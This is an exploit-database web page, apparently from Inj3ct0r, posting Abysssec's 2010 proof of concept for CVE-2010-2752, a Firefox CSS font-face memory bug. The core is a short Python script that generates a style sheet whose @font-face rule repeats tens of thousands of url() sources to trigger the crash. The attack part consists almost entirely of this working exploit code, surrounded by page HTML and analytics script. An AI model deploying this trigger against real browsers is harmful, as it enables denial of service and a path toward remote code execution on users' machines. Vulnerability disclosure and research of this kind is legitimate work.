Home / os / win7

[dos / poc] - Mozilla Firefox CSS font-face Remote Code Exec

Posted on 25 September 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Mozilla Firefox CSS font-face Remote Code Execution Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Date: 25 Sep 2010 | Exploit category: dos / poc | Exploit author: Abysssec | Inj3ct0r exploit database' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=================================================================
Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
=================================================================

  Title             :  Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
  Version           :  Firefox
  Analysis          :  http://www.abysssec.com
  Vendor            :  http://www.mozilla.com
  Impact            :  Crirical
  Contact           :  shahin [at] abysssec.com , info  [at] abysssec.com
  Twitter           :  @abysssec
  CVE               :  CVE-2010-2752
   
&#039;&#039;&#039;
 
import sys;
 
myStyle = &quot;&quot;&quot;
  @font-face {
    font-family: Sean;
    font-style:  normal;
    font-weight: normal;
    src: url(SEAN1.eot);
    src: url(&#039;type/filename.woff&#039;) format(&#039;woff&#039;)
 
&quot;&quot;&quot;
i=0
while(i&lt;50000):
    myStyle = myStyle + &quot;,url(&#039;type/filename.otf&#039;) format(&#039;opentype&#039;)
&quot;;
    i=i+1
 
myStyle = myStyle + &quot;,url(&#039;type/filename.otf&#039;) format(&#039;opentype&#039;);
&quot;;
myStyle = myStyle + &quot;}
&quot;;
cssFile = open(&quot;style2.css&quot;,&quot;w&quot;)
cssFile.write(myStyle)
cssFile.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-25]</pre></body></html>

 

TOP

Malware :

Exploits :